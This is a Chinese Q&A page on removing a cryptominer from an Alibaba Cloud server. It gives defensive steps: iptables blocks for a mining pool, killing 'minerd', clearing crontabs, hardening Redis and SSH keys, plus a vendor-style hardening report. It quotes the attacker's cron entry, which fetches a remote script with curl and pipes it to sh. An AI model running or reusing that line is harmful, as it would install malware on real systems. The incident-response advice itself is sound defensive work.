问答文章1 问答文章501 问答文章1001 问答文章1501 问答文章2001 问答文章2501 问答文章3001 问答文章3501 问答文章4001 问答文章4501 问答文章5001 问答文章5501 问答文章6001 问答文章6501 问答文章7001 问答文章7501 问答文章8001 问答文章8501 问答文章9001 问答文章9501

阿里云服务器被挖矿了怎么办?(纯纯电脑小白

发布网友 发布时间:2022-04-26 22:58

我来回答

3个回答

热心网友 时间:2022-04-06 07:26

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top,查看了一会,没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句:

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下,感兴趣的可以研究下:

 View Code

解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blog.jobbole.com/94518/然后就注入了病毒,下面是解决办法和清除工作:

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.

热心网友 时间:2022-04-06 08:44

不会有什么事,不过建议你重装服务器,设置快照,这样以后被入侵可以及时回滚。而且不必要的端口要关闭。

热心网友 时间:2022-04-06 10:18

春节刚开始,我们SINE安全,发布了2018年服务器被挖矿的整体安全分析报告。该安全报告主要是以我们去年的整一年的安全数据为基础,对这些服务器的被挖矿的整体情况进行了详细的安全分析,为站长以及一些中小企业公司提出了合理的服务器安全防护建议。

在去年的虚拟币市场中,虽然虚拟币经历了暴跌的情况,但是服务器被挖矿的情况还是持续性的增长趋势,背后是一些攻击者利用服务器的漏洞以及网站漏洞进行入侵服务器,拿到服务器权限,在服务器系统里置入木马后门进行挖矿。
下面挖矿的安全报告我们来简要的跟大家分享一下:
去年很多网站系统以及APP应用出现漏洞,PHPCMS 注入漏洞,Thinkphp远程代码执行漏洞,dedecms缓存漏洞,ecshop远程写入漏洞,给整个网络安全带来了很大的危害,关于最新的漏洞利

用以及如何产生的漏洞,我们SINE安全对其公开与分享,对网站的漏洞修复以及补丁,及时的告知与相应,让损失降到最低。我们调查分析发现,从网站漏洞被爆出后到修复漏洞的时间约大,一些网站被攻击的状况就越严重,服务器被挖矿的事情就会发生,如果及时的修复漏洞,那么就可以避免被挖矿。
关于服务器被挖矿的安全部署与防护策略
服务器被挖矿的情况时有发生,我们要对服务器进行详细的安全部署,对远程登录的端口进行更改,像windows的3389端口,改掉,SSH的22端口也要改掉,管理员的账号密码也要更改为数字+字母+符号+大小写的组合来,避免被暴力猜解。对网站的漏洞进行安全检测,发现漏洞立即进行修复,打补丁。有些网站使用开源的系统,要定期的检查系统是否需要更新。如果使用的阿里云服务器,要经常登录服务器查看阿里云云盾的安全提醒,如果出现webshell安全提示,以及阿里云挖矿提示,挖矿恶意进程等安全提示,要尽快进行处理,如果对安全不是太懂的话,建议找专业的安全公司处理,国内像SINE安全,绿盟,启明星辰,都是比较专业的。对于一些网站管理员的账号密码,也要加强,数据库mysql,sql2008等数据库的管理员账号密码也要更改,对数据库的端口也要禁止对外。
声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com
瑞安皇都大厦几个电梯 办签证和护照的具体步骤和一共的费用!我需要详细一点的答案. 办护照流程 办护照的流程是什么 哪位推荐几部韩剧啊!!要像豪杰春香,魔女幼熙这样的,剧情要感人,最好是... 小阴唇内应该是光滑的吗,阴道口痒为什么 阴道口有像草莓样正常吗 任氏族谱字辈:世秉忠贞 永达明玉起 国正天元律迎祖大继昌 河南夏氏家谱辈分我是永城市酂城镇夏氏夏世界具家谱记载洪武二年始祖良... 夏侯姓字辈排行 夏氏辈行,我爷爷明字辈,我父亲应字辈,我是崇字辈,后面是什么辈? 如何通过云计算服务器实现比特币挖矿 能否用云服务器进行cpu挖矿 挖矿是云服务器好还是物理服务器好 80年代的哪些小人书有收藏价值 中国华门的连环九鼎 前四位数字是4个1的连环数的一百元请问有收藏价值吗? 连环画收藏的目录 什么样的小人书才有收藏价值 什么样的小人书有收藏价值 80年代的连环画收藏价值有多大? 连环画有没有收藏价值 百种红色经典连环‘画有收藏价值吗 连环画的画的收藏 中国最经典的连环画有哪些? 无机化学,K2CrO4与NaCl与AgNO3反应现象 1、原理 本实验是重量滴定法滴定Cl- 佛教有名法和色法两种法,名法是精神世界,色法是物质,那么事情的发生是什么法呢? 如何理解现象与本质的辩证关系与方法论意义 法和法律的区别是什么? 现象与本质的辩证关系 唯物辩证法关于本质与现象原理为人们提供了什么样的科学方法? 如何上书法课? 用GPU云服务器可以挖矿么 如何创作书法作品ppt 如何用Linux服务器挖矿教程 《兰亭集序》ppt-公开课 如何选择ipfs服务器? 恒讯云松鼠矿机挖矿哪些配置最重要? 在没有网络的情况下,天猫精灵“智能音箱”能做什么?可以设置闹钟设置备忘录吗? 阿里云windows服务器中了挖矿的病毒怎么清理? IPFS Hero云端挖矿是中心化的服务器吗? windows服务器的挖矿进程怎么关闭删除 虚拟币,比如比特 莱特所谓挖矿是什么? 我有一台GPU服务器,里面包括4块NVIDIA Tesla GPU K20 5GB GDDR5处理器,请问能比特币挖矿吗 二年级书法米字旁弓字旁教学课件 阿里云服务器的cup占用不高,都是系统操作很卡是什么原因(主要是进入服务器的目录都很卡) 阿里云windows服务器如何去除挖矿病毒 红米note手机发不出短信,只能收怎么回事? 红米k30为什么发不了短信? 我的红米2能收到短信,但是短信发不出去(确保短信中心号码正确的前提下)请问这是怎么回事?应该怎么办 我的红米手机发不出信息 小米手机为什么发不出去短信息?小米k40是什么原因